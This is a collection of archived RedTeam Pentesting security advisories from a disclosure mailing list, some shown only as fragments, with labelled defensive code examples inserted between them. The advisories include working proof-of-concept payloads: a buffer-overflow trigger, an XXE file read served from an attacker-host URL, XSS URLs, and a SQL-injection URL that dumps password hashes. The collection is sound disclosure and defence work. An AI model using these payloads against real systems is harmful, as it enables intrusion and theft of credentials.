    char handshake[4096], response[4096], sha1[29], trailer[17];
    [...]
    offset = 0;
    for (i = 0; i < 10; i++) {
        len = ws_recv(ws_ctx, handshake+offset, 4096);
        if (len == 0) {
            handler_emsg("Client closed during handshake\n");
            return NULL;
        }
        offset += len;
        handshake[offset] = 0;
        if (strstr(handshake, "\r\n\r\n")) {
            break;
        }
        usleep(10);
    }
    [...]



As can be seen in the listing, the function ws_recv() is called in a
loop to read data from the client's socket into the stack-allocated
buffer 'handshake'. Each call to ws_recv() reads at most 4096 bytes
from the socket and stores them in the handshake buffer. The variable
'offset' determines the position in the buffer at which the received
data is written. In each iteration, 'offset' is increased by the number
of bytes received. If the received data contains the string
"\r\n\r\n", which marks the end of the WebSocket handshake data, the
loop terminates. Otherwise, the loop terminates after at most 10
iterations. The do_handshake() function returns early if no more data
can be received from the socket.

The read limit passed to ws_recv() is always 4096, regardless of the
current value of 'offset', while the 'handshake' buffer itself holds
only 4096 bytes. Consequently, any iteration after a full first read
writes past the end of the buffer (and the terminating NUL written to
handshake[offset] already lands one byte past it). By sending data that
does not contain the end marker and thereby forcing websockify to
iterate multiple times, attackers can exploit this behaviour to write
data past the space allocated for the handshake buffer and corrupt
adjacent memory.
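The same read loop with the bound that is missing above, as an added example that is not part of the advisory or of websockify's code: the read limit is derived from the space left in the buffer, a client that never sends the end marker is rejected, and a canary after the buffer checks that nothing is written past it (the simulated socket, the function names and the sample inputs are constructed here).

```c
/* Bounded version of the handshake read loop in do_handshake(): the limit
 * passed to each recv() must be the space left in the buffer, not the
 * buffer size, and a client that never sends "\r\n\r\n" within that space
 * is rejected instead of overrunning the stack. Added example, not
 * websockify's code: the simulated socket, the function names and the
 * sample inputs are constructed here. */
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

#define HANDSHAKE_MAX 4096   /* capacity of websockify's handshake[] */
#define RECV_CHUNK    4096   /* read limit the original passes to ws_recv() */

/* Simulated client socket: a byte stream handed out in chunks of at most
 * 'chunk' bytes, standing in for ws_recv(). */
typedef struct {
    const char *data;
    size_t len;
    size_t chunk;
    size_t pos;
} fake_sock;

static size_t fake_recv(fake_sock *s, char *dst, size_t max)
{
    size_t n = s->len - s->pos;
    if (n > s->chunk) n = s->chunk;
    if (n > max) n = max;
    memcpy(dst, s->data + s->pos, n);
    s->pos += n;
    return n;                        /* 0 means the client closed */
}

/* Reads a WebSocket handshake into 'handshake' (capacity HANDSHAKE_MAX,
 * NUL-terminated). Returns the number of bytes read, or -1 when the client
 * closed early, sent too much data without the end marker, or needed more
 * than 10 reads. 'offset' can never reach the end of the buffer, so the
 * terminating NUL also stays in bounds. */
long read_handshake_bounded(fake_sock *sock, char *handshake)
{
    size_t offset = 0;
    for (int i = 0; i < 10; i++) {
        size_t room = HANDSHAKE_MAX - 1 - offset;   /* keep one byte for NUL */
        if (room == 0)
            return -1;               /* buffer full and no "\r\n\r\n": reject */
        size_t want = room < RECV_CHUNK ? room : RECV_CHUNK;
        size_t len = fake_recv(sock, handshake + offset, want);
        if (len == 0)
            return -1;               /* client closed during handshake */
        offset += len;
        handshake[offset] = 0;
        if (strstr(handshake, "\r\n\r\n"))
            return (long)offset;
        /* the original sleeps 10us here before the next read */
    }
    return -1;
}

/* Constructed check: a well-formed handshake arriving in 20-byte pieces
 * is assembled completely. */
bool demo_normal_handshake(void)
{
    static const char hs[] = "GET / HTTP/1.1\r\nHost: example.com\r\n"
                             "Upgrade: websocket\r\n\r\n";
    fake_sock sock = { hs, sizeof hs - 1, 20, 0 };
    char buf[HANDSHAKE_MAX];
    long n = read_handshake_bounded(&sock, buf);
    return n == (long)(sizeof hs - 1) && strcmp(buf, hs) == 0;
}

/* Constructed check: 5000 bytes with no end marker, as in the advisory's
 * curl request, are refused, and a canary placed right after the buffer
 * shows that nothing was written past it. */
bool demo_oversized_request(void)
{
    static char junk[5000];
    memset(junk, 'A', sizeof junk);
    fake_sock sock = { junk, sizeof junk, RECV_CHUNK, 0 };
    struct { char buf[HANDSHAKE_MAX]; char canary[8]; } frame;
    memcpy(frame.canary, "CANARY!", 8);
    long n = read_handshake_bounded(&sock, frame.buf);
    return n == -1 && memcmp(frame.canary, "CANARY!", 8) == 0;
}
```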


Proof of Concept


The following curl command can be used to trigger the buffer overflow:

$ curl http://example.com/$(python -c 'print "A"*5000')

Providing a generic exploit for this vulnerability is not feasible, as
it depends on the server-side environment websockify is used in as well
as on the compiler and compiler flags used. However, during a
penetration test it was possible to successfully exploit this buffer
overflow vulnerability and to execute arbitrary commands on the server.

Workaround
==

Use the Python implementation of websockify.


Fix
===

The vulnerability has been fixed in commit 192ec6f [0].


Security Risk
=

Successful exploitation of the vulnerability allows attackers to execute
arbitrary code on the affected system. It is therefore rated as a high
risk.


Timeline


2016-04-14 Vulnerability identified
2016-05-03 Advisory provided to customer
2016-05-06 Customer provided updated firmware, notified users
2016-05-23 Customer notified users again
2016-05-31 Advisory published


References
==

[0] https://github.com/kanaka/websockify/commit/192ec6f5f9bf9c80a089ca020d05ad4bd9e7bcd9



[FD] [RT-SA-2015-012] XML External Entity Expansion in Paessler PRTG Network Monitor

2016-05-31 Thread RedTeam Pentesting GmbH
Advisory: XML External Entity Expansion in Paessler PRTG Network Monitor

Authenticated users who can create new HTTP XML/REST Value sensors in
PRTG Network Monitor can read local files on the PRTG host system via
XML external entity expansion.


Details
===

Product: Paessler PRTG Network Monitor
Affected Versions: 14.4.12.3282
Fixed Versions: 16.2.23.3077/3078
Vulnerability Type: XML External Entity Expansion
Security Risk: medium
Vendor URL: https://www.paessler.com/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-012
Advisory Status: published
CVE: CVE-2015-7743
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7743


Introduction


"PRTG Network Monitor is the powerful and comprehensive network
monitoring solution from Paessler AG. It monitors your network using a
whole range of technologies and assures the availability of network
components and measures traffic and usage. PRTG saves costs by avoiding
outages, optimizing connections, saving time and controlling service
level agreements (SLAs)."

(from the vendor's website) [1]


More Details


An attacker with access to a PRTG Network Monitor account with
sufficient privileges to create or configure XML/REST sensors can read
files stored on the system's local disk. These sensors are intended to
query a URL and, depending on the configuration, check whether there is
a valid response or read the value of a specific XML node in the
document that is returned. This functionality is vulnerable to XML
external entity expansion.


Proof of Concept


In order to exploit this vulnerability an HTTP XML/REST Value sensor has
to be set up to access an attacker-controlled URL and to read the value
of a specific XML node, for example:

https://attacker.example.com/xeee-hosts.xml

The XML document "xeee-hosts.xml" contains an external entity that uses
the "SYSTEM" keyword to load a local file as the content of the "hosts"
entity:



<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY hosts SYSTEM "C:\Windows\System32\drivers\etc\hosts">
]>
<root>&hosts;</root>


Since the XML parser of PRTG Network Monitor evaluates external
entities, the XML parser fetches the file

"C:\Windows\System32\drivers\etc\hosts"

from the disk of the local system and inserts its content into the
"root" node of the XML document. If the sensor is configured to return
the value of that "root" node, the contents of that file are displayed
in the web interface of PRTG Network Monitor. This discloses the
contents of the file to attackers who otherwise would not be able to
read local files.
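A pre-parse gate a defender can put in front of any XML fetched from a user-supplied URL, as an added example that is not PRTG's or RedTeam's code: it rejects documents whose DOCTYPE references an external DTD or whose internal subset declares a SYSTEM/PUBLIC entity, which is exactly what the document above relies on. It complements, not replaces, configuring the XML library itself not to resolve external entities; the function names and sample documents are constructed.

```c
/* Pre-parse gate for XML fetched from an untrusted URL, as in the PRTG
 * sensor case: reject any document whose DOCTYPE carries an external ID
 * (SYSTEM/PUBLIC, i.e. an external DTD) or whose internal subset declares
 * an external entity. Added example, not PRTG or RedTeam code; the
 * function names are hypothetical and the sample documents are constructed.
 * A DTD-aware parser must still be configured not to resolve external
 * entities; this check only keeps such documents away from it. */
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Constructed sample: the external-entity document described above. */
const char XEE_SAMPLE_DOC[] =
    "<?xml version=\"1.0\"?>\n"
    "<!DOCTYPE root [\n"
    "<!ENTITY hosts SYSTEM \"C:\\Windows\\System32\\drivers\\etc\\hosts\">\n"
    "]>\n"
    "<root>&hosts;</root>\n";

/* Constructed sample: a DTD with only an internal entity, which is
 * harmless and must not be blocked. */
const char XEE_SAMPLE_INTERNAL[] =
    "<?xml version=\"1.0\"?>\n"
    "<!DOCTYPE root [\n"
    "<!ENTITY vendor \"Paessler\">\n"
    "]>\n"
    "<root>&vendor;</root>\n";

static const char *find_token(const char *p, const char *end, const char *tok)
{
    size_t n = strlen(tok);
    for (; p + n <= end; p++)
        if (memcmp(p, tok, n) == 0)
            return p;
    return NULL;
}

static const char *skip_ws(const char *p, const char *end)
{
    while (p < end && isspace((unsigned char)*p))
        p++;
    return p;
}

/* For a declaration "<!DOCTYPE name ..." or "<!ENTITY [%] name ..." that
 * spans [p, end), report whether the token after the name is SYSTEM or
 * PUBLIC, i.e. whether it points at an external resource. */
static bool decl_has_external_id(const char *p, const char *end, const char *kw)
{
    p = skip_ws(p + strlen(kw), end);
    if (p < end && *p == '%')                 /* parameter entity */
        p = skip_ws(p + 1, end);
    while (p < end && !isspace((unsigned char)*p) && *p != '[' && *p != '>')
        p++;                                  /* the declared name */
    p = skip_ws(p, end);
    return (end - p >= 6) &&
           (memcmp(p, "SYSTEM", 6) == 0 || memcmp(p, "PUBLIC", 6) == 0);
}

/* Returns true when the document would make a DTD-aware parser fetch
 * something external. A document without a DOCTYPE is accepted. */
bool xml_declares_external_entity(const char *doc)
{
    const char *end = doc + strlen(doc);
    const char *dt = find_token(doc, end, "<!DOCTYPE");
    if (dt == NULL)
        return false;

    /* The DOCTYPE declaration ends at '[' (internal subset) or '>'. */
    const char *p = dt;
    while (p < end && *p != '[' && *p != '>')
        p++;
    if (decl_has_external_id(dt, p, "<!DOCTYPE"))
        return true;                          /* external DTD */
    if (p == end || *p == '>')
        return false;                         /* no internal subset */

    /* Walk the internal subset up to "]>" and inspect entity declarations. */
    const char *subset_end = find_token(p, end, "]>");
    if (subset_end == NULL)
        subset_end = end;                     /* malformed: scan to the end */
    const char *decl = p;
    while ((decl = find_token(decl, subset_end, "<!ENTITY")) != NULL) {
        const char *close = memchr(decl, '>', subset_end - decl);
        if (close == NULL)
            close = subset_end;
        if (decl_has_external_id(decl, close, "<!ENTITY"))
            return true;
        decl = close;
    }
    return false;
}
```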


Fix
===

Update to a version greater or equal to 16.2.23.3077/3078 (see [2]).


Security Risk
=

Attackers who can create new HTTP XML/REST sensors in PRTG Network
Monitor are able to use the XML external entity expansion to read files
on the local system. Depending on the data stored on the vulnerable
system, this vulnerability may pose a high risk. However, as attackers
are required to already have valid user credentials for the application,
the vulnerability is only rated to have a medium risk potential.


Timeline


2015-08-28 Vulnerability identified in PRTG Network Monitor
2015-09-04 Customer approved disclosure of vulnerability
2015-09-04 CVE ID requested
2015-09-24 CVE ID requested again
2015-10-07 CVE ID assigned
2015-10-21 Vendor contacted
2016-04-04 Vendor released fixed version
2016-05-31 Advisory released


References
==

[1] https://www.paessler.com
[2] https://www.paessler.com/prtg/history/stable



[FD] [RT-SA-2016-002] Cross-site Scripting in Securimage 3.6.2

2016-03-22 Thread RedTeam Pentesting GmbH
Advisory: Cross-site Scripting in Securimage 3.6.2

RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability
in the Securimage CAPTCHA software, which allows attackers to inject
arbitrary JavaScript code via a crafted URL.


Details
===

Product: Securimage
Affected Versions: >= 3.2RC1
Fixed Versions: 3.6.4
Vulnerability Type: Cross-site Scripting
Security Risk: high
Vendor URL: https://www.phpcaptcha.org/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-002
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction


"Securimage is an open-source free PHP CAPTCHA script for generating
complex images and CAPTCHA codes to protect forms from spam and abuse.
It can be easily added into existing forms on your website to provide
protection from spam bots. It can run on most any web server as long as
you have PHP installed, and GD support within PHP. Securimage does
everything from generating the CAPTCHA images to validating the typed
code. Audible codes can be streamed to the browser with Flash for the
vision impaired."

(from the project's homepage)


More Details


The Securimage download package and GitHub repository include several
example scripts to demonstrate the usage of the library. Among these
scripts is the file example_form.ajax.php. It returns JavaScript code
that includes an unencoded value from the variable $_SERVER['PHP_SELF']
directly embedded into the website.

In Securimage versions from 3.2RC1 to 3.5 the following code is
vulnerable:


function processForm()
{
    new Ajax.Request('<?php echo $_SERVER['PHP_SELF'] ?>', {
        method: 'post',
        parameters: $('contact_form').serialize(),
        onSuccess: function(transport) {


In Securimage versions from 3.5.2 to 3.6.2 the following code is
vulnerable:


function processForm()
{
    jQuery.ajax({
        url: '<?php echo $_SERVER['PHP_SELF'] ?>',
        type: 'POST',
        data: jQuery('#contact_form').serialize(),
        dataType: 'json',
    }).done(function(data) {


The problem here is that the value of the variable $_SERVER['PHP_SELF']
can, depending on the configuration of the web server, often be
manipulated by an attacker to include special characters like
apostrophes.


Proof of Concept


The following URL can be used to demonstrate the vulnerability for
Securimage versions from 3.2RC1 to 3.5 with a vulnerable web server
configuration:

http://www.example.com/example_form.ajax.php/');}alert('RedTeam Pentesting');a=function(){a('

Securimage versions from 3.5.2 to 3.6.2 can be exploited with the
following URL:

http://www.example.com/example_form.ajax.php/'});}alert('RedTeam Pentesting');a=function(){a({x:'

The result is a notification showing the text "RedTeam Pentesting". The
value of the variable $_SERVER['PHP_SELF'] is embedded verbatim into
the HTML source code of the resulting web page.


Workaround
==

The file example_form.ajax.php should be deleted from the Securimage
directory on a web server.


Fix
===

Update to version 3.6.4.


Security Risk
=

This security vulnerability is rated as a high risk. It allows executing
arbitrary JavaScript code in users' browsers if they access URLs
prepared by attackers. This provides many possibilities for further
attacks against these users. Since Securimage is usually used as a
software library to provide CAPTCHA functionality for web applications,
the vulnerability could be used to exploit all web applications hosted
on the same domain.


Timeline


2016-02-03 Vulnerability identified
2016-02-12 Customer approved disclosure to vendor
2016-02-23 CVE number requested
2016-02-24 CVE number not assigned, "non-prioritized product"
2016-03-02 Vendor contacted
2016-03-03 Vendor releases fixed version
2016-03-22 Advisory released



[FD] [RT-SA-2014-014] AVM FRITZ!Box: Arbitrary Code Execution Through Manipulated Firmware Images

2016-01-07 Thread RedTeam Pentesting GmbH
assigned
2014-11-17 Vendor provided fixed version to RedTeam Pentesting
2015-07-16 Vendor started releasing fixed versions (7490 [0])
2015-10-01 Vendor finished releasing fixed versions (other models)
2016-01-07 Advisory released


References
==

[0] https://avm.de/service/sicherheitshinweise/



[FD] [RT-SA-2015-005] o2/Telefonica Germany: ACS Discloses VoIP/SIP Credentials

2016-01-07 Thread RedTeam Pentesting GmbH
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.Line.1.SIP.X_AVM-DE_CLIRType
  
  5


  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.PSTNFailOver
  
  0


  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.DTMFMethod
  
  RFC2833


  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.SIP.OutboundProxy
  
  sip.alice-voip.de


  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.SIP.UserAgentDomain
  
  sip.alice-voip.de


  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.SIP.RegistrarServer
  
  sip.alice-voip.de


  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.SIP.ProxyServer
  
  sip.alice-voip.de


  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.Line.1.SIP.AuthPassword
  
  0241463x


  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.Line.1.DirectoryNumber
  
  463x


  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.Line.1.SIP.AuthUserName
  
  49241463x

  
  39315850

  


[msg24] CPE -> ACS B:
-


http://schemas.xmlsoap.org/soap/envelope/;
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/;
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance;
xmlns:xsd="http://www.w3.org/2001/XMLSchema;
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
  
393158501
  
  

  0

  


[msg25] CPE <- ACS B:
-

[empty]



Workaround
==

o2 implemented countermeasures that prevent attackers from spoofing a
victim's IP address in CWMP messages. This prevents attackers from
retrieving arbitrary o2 customers' VoIP credentials.


Fix
===

The CPE needs to be properly authenticated when communicating with the
ACS. One option of doing so would be to provide the password of the DSL
connection. This password is already known to the CPE as it has been
entered manually by the customer during the initial setup process.


Security Risk
=

This vulnerability allows the unauthorised use of other customers' VoIP
telephone numbers. The victim is charged for all costs resulting from
fraudulent phone calls. Furthermore, an attacker may answer phone calls
on behalf of the victim. Customers have no means of defending
themselves against such an attack. Chances are that the attack will be
noticed only by customers who regularly check their invoice. The
vulnerability is therefore considered to pose a high risk.


Timeline


2014-09-08 - Potential vulnerability discovered
2014-09-20 - Vulnerability verified
2014-10-17 - ISP was notified about the vulnerability
2014-10-17 - ISP implemented first countermeasures
2014-10-24 - ISP wants to investigate further
2014-11-28 - ISP needs more time, depends on hardware manufacturer
2015-01-23 - ISP is still investigating, wants to permanently solve the
 problem
2015-03-31 - ISP is still working on the problem, asks for more time
2015-06-12 - ISP wants to notify the proper German authorities about the
 problem first while working on a solution
2015-06-18 - ISP notified German authorities (Bundesnetzagentur, BfDI,
     BSI)
2016-01-08 - Advisory released



[FD] [RT-SA-2015-013] Symfony PHP Framework: Session Fixation In "Remember Me" Login Functionality

2015-12-22 Thread RedTeam Pentesting GmbH
ehow got in possession of the cookie's value or has
successfully set a given cookie value in the user's browser at some
point in the past, the attacker is now able to access the web
application with the user's permissions:

$ curl -s -i 'http://localhost:8000/en/admin/post/' \
-b 'PHPSESSID=redteam'
HTTP/1.1 200 OK
Host: localhost:8000
[...]



[...]

In hac habitasse platea dictumst
anna_ad...@symfony.com
8/23/15, 10:16 AM
[...]


Workaround
==

Disable the "Remember Me" login functionality within the configuration
file security.yml.


Fix
===

Upgrade to a fixed version if possible, otherwise refer to section
Workaround.


Security Risk
=

The described vulnerability allows an attacker to access a Symfony web
application with the attacked user's permissions. The attack requires
that the "Remember Me" login functionality is used by the application.
Additionally, the attacker either got access to the PHPSESSID cookie
value or has successfully set a new value in the user's browser. Because
of its requirements, the described vulnerability poses a low risk only.
The risk estimation may be increased to medium or high based on the
affected web application and the accessible data.


Timeline


2015-09-11 Vulnerability identified
2015-09-16 Customer approved disclosure to vendor
2015-10-27 Vendor notified
2015-11-23 Fixed by vendor [2]
2015-12-22 Advisory released


References
==

[0] https://github.com/symfony/symfony-demo
[1] https://symfony.com/doc/current/cookbook/security/remember_me.html
[2] https://symfony.com/blog/cve-2015-8124-session-fixation-in-the-remember-me-login-feature



[FD] [RT-SA-2015-002] SQL Injection in TYPO3 Extension Akronymmanager

2015-06-15 Thread RedTeam Pentesting GmbH
Advisory: SQL Injection in TYPO3 Extension Akronymmanager

An SQL injection vulnerability in the TYPO3 extension Akronymmanager
allows authenticated attackers to inject SQL statements and thereby read
data from the TYPO3 database.


Details
===

Product: sb_akronymmanager
Affected Versions: <=0.5.0
Fixed Versions: 7.0.0
Vulnerability Type: SQL Injection
Security Risk: medium
Vendor URL: http://typo3.org/extensions/repository/view/sb_akronymmanager
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-002
Advisory Status: published
CVE: CVE-2015-2803
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2803


Introduction


The Acronym Manager adds special explanatory markup to acronyms, abbreviations
and foreign words on the whole site following the requirement to accessible web
content.

It provides a backend module to administer a list of words to generate new HTML
elements for explanatory markup.

(from the extension's documentation)


More Details


Users with the respective privileges can maintain acronyms through the
Akronymmanager extension pages in the TYPO3 backend web interface.

In the extension's file mod1/index.php, an SQL query is generated like
follows (line 357 and following):

[...]
$pageID = t3lib_div::_GET('id');
if ($pageID) $where = "uid='$pageID' AND ";
$result = $GLOBALS['TYPO3_DB']->exec_SELECTquery('title,uid', 'pages',
    $where.'hidden=0 AND deleted=0','sorting');
[...]

The value of the user-supplied HTTP GET parameter 'id' is used without
sanitizing it before its use in the subsequent SQL statement. Therefore,
attackers are able to manipulate the resulting SQL statement and inject
their own queries into the statement.


Proof of Concept


When requesting the following URL, the vulnerability is exploited to
yield all usernames and password hashes from the be_users table of the
TYPO3 database:


http://www.example.org/typo3conf/ext/sb_akronymmanager/mod1/index.php?id=379%27%20UNION%20SELECT%20(SELECT%20group_concat(username,%27:%27,password)%20FROM%20be_users),2%20--%20


The login credentials are then embedded in the HTML page that is
returned: 

[...]
  <!-- Section header -->
  <h2>user1:$hash,user2:$hash[...]</h2>
[...]


Workaround
==

Only give trusted users access to the Akronymmanager extension in the
TYPO3 backend.


Fix
===

Upgrade the extension to version 7.0.0.


Security Risk
=

An attacker who has access to the backend part of the Akronymmanager
extension may send SQL queries to the database. This can be used to read
arbitrary tables of the TYPO3 database and may ultimately result in a
privilege escalation if the TYPO3 users' password hashes can be cracked
efficiently. Depending on the database configuration, it might also be
possible to execute arbitrary commands on the database host. As the
attack requires an attacker who already has backend access, the
vulnerability is estimated to pose only a medium risk.


Timeline


2015-02-25 Vulnerability identified
2015-03-04 Customer approved disclosure to vendor
2015-03-10 CVE number requested
2015-03-10 Vendor notified
2015-03-26 CVE number requested again
2015-03-31 CVE number assigned (request #2)
2015-03-31 Vendor notified again
2015-03-31 Vendor responded
2015-04-08 Vendor announced fixed version available at the end of April
2015-05-13 Requested update from vendor
2015-05-15 Vendor requests more time
2015-05-21 Requested update from vendor
2015-05-22 Vendor states that upload to extension registry doesn't work
2015-06-03 Requested update from vendor
2015-06-10 Vendor uploads new version to extension registry
2015-06-15 Advisory published




[FD] [RT-SA-2015-003] Alcatel-Lucent OmniSwitch Web Interface Weak Session ID

2015-06-10 Thread RedTeam Pentesting GmbH
 affected versions
2015-06-10 Advisory released




RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.


[FD] [RT-SA-2015-004] Alcatel-Lucent OmniSwitch Web Interface Cross-Site Request Forgery

2015-06-10 Thread RedTeam Pentesting GmbH
 on the switch for
future access. While a successful attack results in full access to the switch,
the attack is hard to exploit because attackers need to know the IP address of
the switch and get an administrative user to access an attacker-controlled web
page. The vulnerability is therefore rated as a medium risk.


Timeline


2015-03-16 Vulnerability identified
2015-03-25 Customer approves disclosure to vendor
2015-03-26 CVE number requested
2015-03-31 CVE number assigned
2015-04-01 Vendor notified
2015-04-02 Vendor acknowledged receipt of advisories
2015-04-08 Requested status update from vendor, vendor is investigating
2015-04-29 Requested status update from vendor, vendor is still investigating
2015-05-22 Requested status update from vendor
2015-05-27 Vendor is working on the issue
2015-06-05 Vendor notified customers
2015-06-08 Vendor provided details about affected versions
2015-06-10 Advisory released


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.



[FD] [RT-SA-2014-016] Directory Traversal and Arbitrary File Disclosure in hybris Commerce Software Suite

2015-02-18 Thread RedTeam Pentesting GmbH
}|-)



Workaround
==

Implement a new filter which validates file names and insert this filter
before hybris' own MediaFilter. The new filter should return an error
when a file outside the media directory is requested.


Fix
===

Upgrade to a fixed hybris version or apply the vendor's hot fix.


Security Risk
=

This vulnerability can be used to download files from the file system of
the server. This includes, among others, configuration files and the
hybris order logfile, which contains sensitive data. Therefore, the
vulnerability poses a high risk.


Timeline


2014-10-08 Vulnerability identified
2014-10-08 Customer notified vendor
2014-10-29 Vendor released fixed version
2014-11-11 CVE number requested
2014-11-12 Vendor requests more time to notify their customers
2014-11-14 CVE number assigned
2014-12-08 Vendor again requests more time to notify customers
2015-01-12 Vendor notifies customers again, agrees to release advisory
   on 2015-02-18
2015-02-17 Vendor requests more time to notify customers for the 3rd
   time, RedTeam Pentesting declines
2015-02-18 Advisory released


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.


[FD] [RT-SA-2014-013] Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics Page

2015-02-10 Thread RedTeam Pentesting GmbH
Advisory: Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics
  Page

During a penetration test, RedTeam Pentesting discovered that the IBM
Endpoint Manager Relay Diagnostics page allows anybody to persistently
store HTML and JavaScript code that is executed when the page is opened
in a browser.


Details
===

Product: IBM Endpoint Manager
Affected Versions:  9.1.x versions earlier than 9.1.1229,
9.2.x versions earlier than 9.2.1.48
Fixed Versions: 9.1.1229, 9.2.1.48
Vulnerability Type: Cross-Site Scripting
Security Risk: medium
Vendor URL: http://www-03.ibm.com/software/products/en/endpoint-manager-family
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-013
Advisory Status: published
CVE:  CVE-2014-6137
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6137


Introduction


IBM Endpoint Manager products - built on IBM BigFix technology - can
help you achieve smarter, faster endpoint management and security. These
products enable you to see and manage physical and virtual endpoints
including servers, desktops, notebooks, smartphones, tablets and
specialized equipment such as point-of-sale devices, ATMs and
self-service kiosks. Now you can rapidly remediate, protect and report
on endpoints in near real time.

(from the vendor's homepage)


More Details


Systems that run IBM Endpoint Manager (IEM, formerly Tivoli Endpoint
Manager, or TEM) components, such as TEM Root Servers or TEM Relays,
typically serve HTTP and HTTPS on port 52311. There, the server or relay
diagnostics page is normally accessible at the path /rd. That page can
be accessed without authentication and lets users query and modify
different information. For example, a TEM Relay can be instructed to
gather a specific version of a certain Fixlet site by requesting a URL
such as the following:

http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
  BESGatherMirrorNew.exe/-gatherversion
  ?Body=GatherSpecifiedVersion
  &url=http://tem-root.example.com:52311/cgi-bin/bfgather.exe/actionsite
  &version=1
  &useCRC=0

The URL parameter url is susceptible to cross-site scripting. When the
following URL is requested, the browser executes the JavaScript code
provided in the parameter:

http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
  BESGatherMirrorNew.exe/-gatherversion
  ?Body=GatherSpecifiedVersion
  &version=1
  &url=http://"><script>alert(/XSS/)</script>
  &version=1
  &useCRC=0

The value of that parameter is also stored in the TEM Relay's site list,
so that the embedded JavaScript code is executed whenever the
diagnostics page is opened in a browser:

$ curl http://tem-relay.example.com:52311/rd
[...]

<select NAME="url">
[...]
<option>http://"><script>alert(/XSS/)</script></option>
</select>


Proof of Concept


http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
  BESGatherMirrorNew.exe/-gatherversion
  ?Body=GatherSpecifiedVersion&version=1
  &url=http://"><script>alert(/XSS/)</script>
  &version=1
  &useCRC=0
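As an added example (not part of the advisory and not IBM code), the
following Python 3 script checks whether a relay's site list has been
poisoned in the way described above: it parses a saved copy of the /rd
page, collects the entries of the <select name="url"> list and flags
every entry that is not a plain http(s) URL. The embedded sample page is
constructed for this demonstration and only mirrors the shape of the
curl output above; the tem-root.example.com site URL is the advisory's
placeholder.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample of a relay diagnostics page (/rd) after the stored
# payload from the advisory has been written into the site list. It only
# mimics the shape of the curl output in the advisory; the hostnames are
# the advisory's example placeholders.
SAMPLE_RD_PAGE = """
<html><body>
<form method="GET" action="/cgi-bin/bfenterprise/BESGatherMirrorNew.exe/-gatherversion">
<select NAME="url">
<option>http://tem-root.example.com:52311/cgi-bin/bfgather.exe/actionsite</option>
<option>http://"><script>alert(/XSS/)</script></option>
</select>
</form>
</body></html>
"""


class SiteListParser(HTMLParser):
    """Collect the raw text of every <option> inside <select name="url">.

    Markup nested inside an option is re-serialised into the collected
    text, so an injected <script> element stays visible to the caller
    instead of being silently split into separate tag events."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.in_url_select = False
        self.in_option = False
        self.options = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "select" and (attrs.get("name") or "").lower() == "url":
            self.in_url_select = True
        elif tag == "option" and self.in_url_select:
            # </option> may be omitted in HTML; a new <option> closes the old one
            self.in_option = True
            self.options.append("")
        elif self.in_option:
            self.options[-1] += self.get_starttag_text()

    def handle_endtag(self, tag):
        if tag == "select":
            self.in_url_select = self.in_option = False
        elif tag == "option":
            self.in_option = False
        elif self.in_option:
            self.options[-1] += "</%s>" % tag

    def handle_data(self, data):
        if self.in_option:
            self.options[-1] += data


def is_plain_site_url(value):
    """True only for a bare http(s)://host... URL without HTML metacharacters."""
    if any(ch in value for ch in '<>"\''):
        return False
    try:
        parts = urlsplit(value)
    except ValueError:
        return False
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def suspicious_site_urls(page_html):
    """Return the site-list entries of a /rd page that look injected."""
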